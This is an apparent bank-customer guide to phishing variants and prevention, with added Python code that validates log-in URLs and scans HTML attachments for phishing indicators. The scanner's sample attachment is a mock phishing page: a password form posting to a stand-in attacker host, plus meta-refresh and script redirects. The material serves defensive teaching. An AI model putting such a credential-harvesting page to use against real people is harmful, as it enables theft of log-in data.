
Phishing

Attackers use phishing to obtain log-in data from unsuspecting Internet users, for instance to then access e-banking facilities or online shops. In the process, the attackers adopt a fake identity, exploiting their victims’ good faith.

Protect yourself against phishing by...

  • never using any links you receive by e-mail, SMS or messenger services, and never scanning any such QR codes to log into your financial institution’s facility.
  • never filling in any forms received by e-mail that ask you to enter log-in information.
  • treating any attachments received with e-mails and text messages with great caution.
  • never disclosing any confidential information, such as passwords, during telephone calls.
  • always entering the address of your online service provider’s or financial institution’s log-in page manually in the browser address line.
  • checking that there is an SSL connection (https://, lock symbol) when calling up a log-in page, and verifying that the Internet address shown in your browser’s address bar actually indicates that you have reached the correct page.
  • contacting your financial institution if you are not quite sure or something is not completely clear.
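The address-bar check from the list above, written out as a small Python function. This is an added example and not code from the original page: it accepts a URL only if it uses https and its host is exactly the expected log-in domain or a subdomain of it, and it rejects the common look-alike patterns (expected domain placed in front of another domain, credentials before an “@”, internationalised labels). The host ebanking.example-bank.ch and the attacker.invalid addresses are constructed placeholders, not real sites.

```python
from urllib.parse import urlsplit

# Assumed placeholder for the institution's real log-in host (not a real bank).
EXPECTED_HOST = "ebanking.example-bank.ch"


def check_login_url(url: str, expected_host: str = EXPECTED_HOST) -> tuple[bool, str]:
    """Return (ok, reason). ok is True only when the URL uses https and its
    host is exactly expected_host or a subdomain of it."""
    try:
        parts = urlsplit(url.strip())
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"

    # 1. Secure connection: the page asks for https:// (the lock symbol).
    if parts.scheme.lower() != "https":
        return False, f"no https connection (scheme is {parts.scheme or 'missing'})"

    host = (parts.hostname or "").lower()
    if not host:
        return False, "URL has no host"

    # 2. Text before '@' is user info, not the host: in
    #    https://ebanking.example-bank.ch@attacker.invalid/ the host is attacker.invalid.
    if parts.username is not None:
        return False, f"text before '@' is not the host; the real host is {host}"

    # 3. Internationalised labels (xn--) can imitate Latin letters; treat as unverified.
    if "xn--" in host or any(ord(c) > 127 for c in host):
        return False, f"host {host} uses non-ASCII/punycode characters"

    # 4. The expected domain must be the END of the host, not merely contained in it:
    #    ebanking.example-bank.ch.attacker.invalid only starts with it.
    if host == expected_host or host.endswith("." + expected_host):
        return True, f"host {host} belongs to {expected_host}"
    return False, f"host {host} is not {expected_host}"


if __name__ == "__main__":
    # Constructed sample addresses for a quick demonstration.
    for sample in [
        "https://ebanking.example-bank.ch/login",
        "http://ebanking.example-bank.ch/login",
        "https://ebanking.example-bank.ch.attacker.invalid/login",
        "https://ebanking.example-bank.ch@attacker.invalid/login",
        "https://ebanking.examp1e-bank.ch/login",
    ]:
        ok, reason = check_login_url(sample)
        print("OK  " if ok else "WARN", sample, "->", reason)
```

The suffix test in step 4 is the part people most often get wrong: a host that merely contains the bank’s name, or starts with it, is not the bank’s host; only a host that ends in the registered domain is.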

A typical phishing attack

1. Contact

Criminals send out faked e-mails purporting to come from employees of online service providers or financial institutions. The recipients of such e-mails are for instance informed that their account information or access data (e.g. user name and password) are no longer safe or up to date, and that they should be updated using the link stated in the e-mail.

2. Intercepting personal data

The link stated in the e-mail does not, however, lead to the original service provider’s page, but to a faked website, albeit a very authentic-looking one. Personal information entered there, such as passwords, ends up directly in the hands of the perpetrators.

3. Gain

Using the stolen information, the perpetrators then, for instance, carry out remittances from their victim’s bank account, buy online at the victim’s cost or place faked offers with online auction houses.

For you to receive phishing mails, fraudsters have to know your e-mail address first. To reduce this risk, and the spam received in your inbox generally, it helps to follow some simple rules, to be found in our article on spam.

Phishing means the theft of information which is worthy of protection, for instance Internet users’ log-in information.

The term phishing is made up from the words “password” and “fishing”.

Further information for anyone interested

Classic phishing

With classic phishing, the attackers try to lure their victims to a counterfeit website with the help of a faked e-mail and to get them to enter their log-in information (for instance account number, password) there.

Alternatively or additionally, they may also add mail attachments containing a Trojan. Once this attachment is opened, it installs itself in the background, proceeding to capture Internet users’ access details or directing them to fake websites.

Important to know: Financial institutions would never send out e-mails like that!

Prevention: Never click any links or attachments in e-mails, but always enter the financial institution’s address into your browser manually, and check the SSL connection and certificate.

Spear phishing and dynamite phishing

In contrast to classic phishing, which involves large numbers of e-mails randomly sent to a broad public, with spear phishing the recipients are specifically chosen and receive e-mails personally tailored to them.

Senders take on the guise of a trustworthy person here, often posing as an acquaintance, employee or business partner of the recipient. The personalised e-mail contents seem credible and authentic and are therefore at times not even recognised by spam filters.

If such personalised e-mails are created automatically and sent out en masse, this is also called “dynamite phishing”.

Prevention: Remain wary of unexpected e-mails or those with unusual contents, even if you think you know the sender. In case of doubt, contact the sender via a second channel, for instance by telephone.

Smishing (SMS phishing)

SMS messages are increasingly used for phishing attacks, too. The perfidious thing about “smishing” is that most of the criteria suitable for recognising phishing e-mails cannot be applied to SMS messages: there is usually no personal form of address. The language and design of these text messages are too simple and brief to allow any conclusions as to whether they are fake. On most mobile devices, it is rather difficult or unreliable to check the true sender and the link. Many users are also used to receiving SMS messages to verify their e-banking log-in or before financial transactions are carried out.

Prevention: Never click on any links included in SMS messages, but manually enter the website address of your financial institution which you are familiar with into your browser. Then check that there is a secure connection (lock symbol, target address). If you receive any unexpected SMS messages, contact your bank via the contact information you know (for instance their official telephone number) and have them confirm that they actually sent this SMS.

Vishing (voice phishing or phone phishing)

Vishing is the voice- or telephone-based version of phishing. Similar to classic phishing, a well thought-out story is employed to induce users to disclose confidential information, such as the log-in details for their e-banking facility.

Prevention: Never let other people know any of your confidential data, such as passwords. Immediately terminate any phone calls asking you for such details. Contact your financial institution only via their official telephone numbers.

QR phishing

With QR phishing, attackers simply stick their own QR codes (Quick Response codes) over those displayed in frequently visited places and direct gullible users to a fake URL. This way, it is easily possible to execute scripts or show a faked financial institution log-in page, in particular on mobile devices.

Prevention: Never use any QR codes to log into any financial institution site. Before scanning any QR code, check whether it has been covered up by a fake one. Check whether the link points to the address you intended.

Phishing using websites in the attachment

When phishing using websites, no link or document is included in the e-mail you receive; instead, there is simply an HTM or HTML file containing a fake website in the attachment. Victims are fooled, since there is no link to click on. And at first glance, the attached file doesn’t seem to be that dangerous either, as it isn’t an actual document (Word, Excel) which could for instance run macros.

But caution! HTM and HTML files can redirect victims straight to the attacker’s server! Any log-in information then entered will end up in the wrong hands this way. In addition, such files can also contain scripts, which may cause even more damage.

Such redirects and scripts are blocked by up-to-date e-mail software for security reasons. If, however, you open such an HTM or HTML attachment, it is no longer controlled by the mail program’s security settings. This is extra perfidious because even users who are aware of phishing in general are duped: the browser address line “only” shows a local file path and not a dubious URL, as is displayed with classic phishing.

Prevention: Be wary of any HTM or HTML attachments in general. Don’t click on any e-mail attachments, but always enter your financial institution’s address into your browser manually.
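To make the section above concrete, here is an added example (not code from the original page) of a small inspector that a mail gateway or a cautious user could run over an HTML attachment before opening it. It flags exactly the indicators the text describes: a meta-refresh redirect, a form that submits to another host, a password field sitting in a local file, a script that loads from elsewhere, and a script statement that changes the browser location. The sample attachment is constructed for the demonstration, and the attacker.invalid and example-bank.ch hosts are placeholders.

```python
import re
from html.parser import HTMLParser

# Script statements that send the browser somewhere else (assignments or calls,
# not read-only uses such as "var u = location.href;").
LOCATION_CHANGE = re.compile(
    r"(?<!\w)(?:window\.|document\.)?location\s*(?:\.(?:href|replace|assign))?\s*[=(]"
)
# An absolute URL (http://, https:// or scheme-relative //) as a form action.
EXTERNAL_URL = re.compile(r"^\s*(?:https?:)?//", re.IGNORECASE)


class AttachmentInspector(HTMLParser):
    """Collects indicators typical of credential-phishing HTML attachments."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; valueless attributes give None.
        a = {name: (value or "") for name, value in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(f"meta refresh redirect: {a.get('content', '')}")
        elif tag == "form" and EXTERNAL_URL.match(a.get("action", "")):
            self.findings.append(f"form submits to another host: {a['action']}")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password field inside a local HTML file")
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.findings.append(f"external script loaded: {a['src']}")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and LOCATION_CHANGE.search(data):
            self.findings.append("script changes the browser location")


def inspect_html_attachment(html: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    inspector = AttachmentInspector()
    inspector.feed(html)
    inspector.close()
    return inspector.findings


# Constructed sample attachment; attacker.invalid is a reserved placeholder domain.
SAMPLE_ATTACHMENT = """<html><head>
<meta http-equiv="refresh" content="0;url=https://login.example-bank.ch.attacker.invalid/">
</head><body>
<form method="post" action="https://collect.attacker.invalid/submit">
  <input name="user"><input type="password" name="pass">
</form>
<script>setTimeout(function () { window.location.href = "https://attacker.invalid/"; }, 3000);</script>
</body></html>"""

if __name__ == "__main__":
    for finding in inspect_html_attachment(SAMPLE_ATTACHMENT):
        print("WARN:", finding)
```

The inspector only reads the file; it never renders it, so the redirect and the script are reported rather than executed. Any non-empty result is a reason to discard the attachment and to reach the institution by typing its address into the browser yourself.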
